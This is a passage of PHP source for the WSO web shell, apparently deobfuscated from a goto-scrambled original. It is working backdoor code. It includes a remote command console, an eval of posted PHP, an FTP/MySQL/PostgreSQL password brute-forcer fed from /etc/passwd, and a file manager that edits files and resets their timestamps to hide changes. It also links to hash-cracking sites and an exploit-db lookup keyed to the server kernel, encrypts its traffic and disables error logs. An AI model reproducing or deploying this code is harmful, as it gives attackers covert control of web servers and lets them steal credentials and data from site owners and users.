(isset($_POST["p3"])) { $_POST["p3"] = iconv("utf-8", $_POST["charset"], decrypt($_POST["p3"], $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])); } } goto nbMDY; ZuuFx: $safe_mode = @ini_get("safe_mode"); goto AH6j_; p2UEO: @ini_set("error_log", NULL); goto r2c06; XXfsY: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto Y5ImI; Y2Zvy: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "d.cf.cmd.value='';\xa"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("\xa$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"]), "\xa\xd\x9\'\x0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script>\xaif(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xavar cur = 0;
function kp(e) {\xa\x9var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {\xa		cur--;
\x9\x9if(cur>=0)
	\x9	document.cf.cmd.value = cmds[cur];
\x9	else
\x9\x9	cur++;
	} else if(n == 40) {\xa\x9	cur++;
		if(cur < cmds.length)
		\x9document.cf.cmd.value = cmds[cur];\xa	\x9else\xa	\x9	cur--;
\x9}
}\xafunction add(cmd) {
	cmds.pop();
\x9cmds.push(cmd);\xa	cmds.push('');\xa	cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "
" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>d.cf.cmd.focus();</script>"; hardFooter(); } goto WMTEU; G8cmK: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<input type=hidden name=ne  value="">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value="127.0.0.1"></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>" . "<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>" . "<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>"; echo "</div>"; hardFooter(); } goto hgt_8; n9j03: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto iBn85; mdCfK: @define("VERSION", "4.2.5"); goto PnC_E; MQqk2: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . viewPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $oRb) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value="submit"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value="submit"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= "\xa"; } } echo "<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#202832><span style="font-weight: normal;"><pre>" . $h[0] . "</pre></span></td><td bgcolor=#060a10><pre>" . $h[1] . "</pre></td><td bgcolor=#202832><pre>" . htmlspecialchars($h[2]) . "</pre></td></tr></table>"; break; case "rename": if (!empty($_POST["p3"])) { if (!@rename($_POST["p1"], $_POST["p3"])) { echo "Can't rename!<br>"; } else { die("<script>g(null,null,"" . urlencode($_POST["p3"]) . "",null,"")</script>"); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.name.value);return false;"><input type=text name=name value="" . htmlspecialchars($_POST["p1"]) . ""><input type=submit value="submit"></form>"; break; case "touch": if (!empty($_POST["p3"])) { $time = strtotime($_POST["p3"]); if ($time) { if (!touch($_POST["p1"], $time, $time)) { echo "Fail!"; } else { echo "Touched!"; } } else { echo "Bad time format!"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.touch.value);return false;"><input type=text name=touch value="" . date("Y-m-d H:i:s", @filemtime($_POST["p1"])) . ""><input type=submit value="submit"></form>"; break; case "frame": $frameSrc = substr(htmlspecialchars($GLOBALS["cwd"]), strlen(htmlspecialchars($_SERVER["DOCUMENT_ROOT"]))); if ($frameSrc[0] != "/") { $frameSrc = "/" . $frameSrc; } if ($frameSrc[strlen($frameSrc) - 1] != "/") { $frameSrc = $frameSrc . "/"; } $frameSrc = $frameSrc . htmlspecialchars($_POST["p1"]); echo "<iframe width="100%" height="900px" scrolling="no" src=" . $frameSrc . " onload="onload=height=contentDocument.body.scrollHeight"></iframe>"; break; } echo "</div>"; hardFooter(); } goto XGk3X; wJWJM: if ($cwd[strlen($cwd) - 1] != "/") { $cwd .= "/"; } goto x892n; Bpag2: function actionStringTools() { if (!function_exists("hex2bin")) { function hex2bin($p) { return decbin(hexdec($p)); } } if (!function_exists("binhex")) { function binhex($p) { return dechex(bindec($p)); } } if (!function_exists("hex2ascii")) { function hex2ascii($p) { $r = ''; for ($i = 0; $i < strLen($p); $i += 2) { $r .= chr(hexdec($p[$i] . $p[$i + 1])); } return $r; } } if (!function_exists("ascii2hex")) { function ascii2hex($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= sprintf("%02X", ord($p[$i])); } return strtoupper($r); } } if (!function_exists("full_urlencode")) { function full_urlencode($p) { $r = ''; for ($i = 0; $i < strlen($p); ++$i) { $r .= "%" . dechex(ord($p[$i])); } return strtoupper($r); } } $stringTools = array("Base64 encode" => "base64_encode", "Base64 decode" => "base64_decode", "Url encode" => "urlencode", "Url decode" => "urldecode", "Full urlencode" => "full_urlencode", "md5 hash" => "md5", "sha1 hash" => "sha1", "crypt" => "crypt", "CRC32" => "crc32", "ASCII to HEX" => "ascii2hex", "HEX to ASCII" => "hex2ascii", "HEX to DEC" => "hexdec", "HEX to BIN" => "hex2bin", "DEC to HEX" => "dechex", "DEC to BIN" => "decbin", "BIN to HEX" => "binhex", "BIN to DEC" => "bindec", "String to lower case" => "strtolower", "String to upper case" => "strtoupper", "Htmlspecialchars" => "htmlspecialchars", "String length" => "strlen"); if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); if (in_array($_POST["p1"], $stringTools)) { echo $_POST["p1"]($_POST["p2"]); } $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xd\x9\'\x0") . "';
"; echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<h1>String conversions</h1><div class=content>"; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><label><select name='selectTool'>"; foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; } echo "</select></label><input type='submit' value='submit'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST["p1"]) ? '' : htmlspecialchars(@$_POST["p2"])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST["p1"]) ? "display:none;" : '') . "margin-top:5px' id='strOutput'>"; if (!empty($_POST["p1"])) { if (in_array($_POST["p1"], $stringTools)) { echo htmlspecialchars($_POST["p1"]($_POST["p2"])); } } echo "</pre></div><br><h1>Search files:</h1><div class=content>
\x9\x9<form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>
		\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xa\x9\x9\x9<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS["cwd"]) . "' style='width:100%'></td></tr>
		\x9<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\xa	\x9\x9<tr><td></td><td><input type='submit' value='submit'></td></tr>\xa		\x9</table></form>"; function hardRecursiveGlob($path) { if (substr($path, -1) != "/") { $path .= "/"; } $paths = @array_unique(@array_merge(@glob($path . $_POST["p3"]), @glob($path . "*", GLOB_ONLYDIR))); if (is_array($paths) && @count($paths)) { foreach ($paths as $) { if (@is_dir($)) { if ($path != $) { hardRecursiveGlob($); } } else { if (empty($_POST["p2"]) || @strpos(file_get_contents($), $_POST["p2"]) !== false) { echo "<a href='#' onclick='g("FilesTools",null,"" . urlencode($) . "", "view","")'>" . htmlspecialchars($) . "</a><br>"; } } } } } if (@$_POST["p3"]) { hardRecursiveGlob($_POST["c"]); } echo "</div><br><h1>Search for hash:</h1><div class=content>\xa\x9\x9<form method='post' target='_blank' name='hf'>
\x9\x9\x9<input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
\x9		<input type='submit' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9		<input type='submit' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>\xa            <input type='submit' value='fakenamegenerator.com' onclick="document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()"><br>
	\x9\x9<input type='submit' value='hashcrack.com' onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br>\xa\x9\x9\x9<input type='submit' value='toolki.com' onclick="document.hf.action='http://toolki.com/';document.hf.submit()"><br>
	\x9\x9<input type='submit' value='fopo.com.ar' onclick="document.hf.action='http://fopo.com.ar/';document.hf.submit()"><br>
			<input type='submit' value='md5decrypter.com' onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br>
		</form></div>"; hardFooter(); } goto aQUM2; J_363: $home_cwd = @getcwd(); goto QdAU6; QdAU6: if (isset($_POST["c"])) { @chdir($_POST["c"]); } goto LarW_; PIzrX: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "key", $); } goto ewK8X; AH6j_: if (!$safe_mode) { error_reporting(0); } goto OUica; fgiAj: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto MBmWc; Y5ImI: function viewPermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000><b>" . perms(@fileperms($f)) . "</b></font>"; } elseif (!@is_writable($f)) { return "<font color=white><b>" . perms(@fileperms($f)) . "</b></font>"; } else { return "<font color=#FFDB5F><b>" . perms(@fileperms($f)) . "</b></font>"; } } goto n9j03; x892n: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\x96\x9c"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . VERSION . "</title>
<style>
	body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
	#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
	body,td,th\x9{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
	table.info	{color:#C3C3C3;}\xa	table#toolsTbl {background-color: #060A10;}
\x9span,h1,a	{color:#fff !important;}
	span\x9\x9{font-weight:bolder;}
\x9h1	\x9	{border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}\xa	div.content\x9{padding:5px;margin-left:5px;background-color:#060a10;}\xa	a	\x9	{text-decoration:none;}\xa	a:hover\x9\x9{text-decoration:underline;}
\x9.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\xa\x9.tooltip:hover::after {opacity:1;visibility:visible;}
	.ml1		{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
\x9.bigarea	{min-width:100%;max-width:100%;height:400px;}\xa	input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}\xa	label {position:relative}\xa\x9label:after {content:'<>';font:10px 'Consolas', monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}
	label:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
	form	\x9{margin:0px;}
	#toolsTbl\x9{text-align:center;}\xa	#fak 	\x9{background:none;}\xa	#fak td 	{padding:5px 0 0 0;}\xa\x9iframe\x9	{border:1px solid #060a10;}\xa\x9.toolsInp	{width:300px}\xa	.main th\x9{text-align:left;background-color:#060a10;}\xa	.main tr:hover{background-color:#354252;}\xa\x9.main td, th{vertical-align:middle;}
	input[type='submit']{background-color:#2E6E9C;}\xa	input[type='button']{background-color:#2E6E9C;}\xa	input[type='submit']:hover{background-color:#56AD15;}\xa	input[type='button']:hover{background-color:#56AD15;}\xa	.l1			{background-color:#202832;}
	pre\x9\x9	{font:9pt Courier New;}
</style>\xa<script>\xa    var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';
    var a_ = '" . htmlspecialchars(@$_POST["a"]) . "'
    var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "';\xa    var p1_ = '" . (strpos(@$_POST["p1"], "\xa") !== false ? '' : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "';\xa    var p2_ = '" . (strpos(@$_POST["p2"], "
") !== false ? '' : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "';\xa    var p3_ = '" . (strpos(@$_POST["p3"], "
") !== false ? '' : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "';
    var d = document;\xa	
\x9function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
\x9function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\xa\x9function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
\x9function set(a,c,p1,p2,p3,charset) {
\x9	if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
\x9\x9if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
\x9	if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\xa		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
\x9	if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\xa	\x9d.mf.a.value = encrypt(d.mf.a.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa\x9	d.mf.c.value = encrypt(d.mf.c.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa		d.mf.p1.value = encrypt(d.mf.p1.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
	\x9d.mf.p2.value = encrypt(d.mf.p2.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');\xa		d.mf.p3.value = encrypt(d.mf.p3.value,'" . $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "key"] . "');
\x9\x9if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
\x9}\xa	function g(a,c,p1,p2,p3,charset) {
\x9\x9set(a,c,p1,p2,p3,charset);\xa		d.mf.submit();\xa	}\xa	function a(a,c,p1,p2,p3,charset) {\xa\x9\x9set(a,c,p1,p2,p3,charset);
\x9	var params = 'ajax=true';
\x9	for(i=0;i<d.mf.elements.length;i++)\xa\x9		params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
	\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
\x9}\xa	function sr(url, params) {
		if (window.XMLHttpRequest)\xa	\x9	req = new XMLHttpRequest();
\x9\x9else if (window.ActiveXObject)\xa		\x9req = new ActiveXObject('Microsoft.XMLHTTP');\xa        if (req) {\xa            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);\xa            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
            req.send(params);\xa        }\xa\x9}\xa\x9function processReqChange() {\xa	\x9if( (req.readyState == 4) )\xa	\x9\x9if(req.status == 200) {
				var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
\x9\x9		var arr=reg.exec(req.responseText);
\x9	\x9	eval(arr[2].substr(0, arr[1]));
\x9	\x9} else alert('Request error!');
\x9}\xa</script>\xa<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>
<form method=post name=mf style='display:none;'>\xa<input type=hidden name=a>\xa<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = "http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description="; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_charsets = ''; foreach 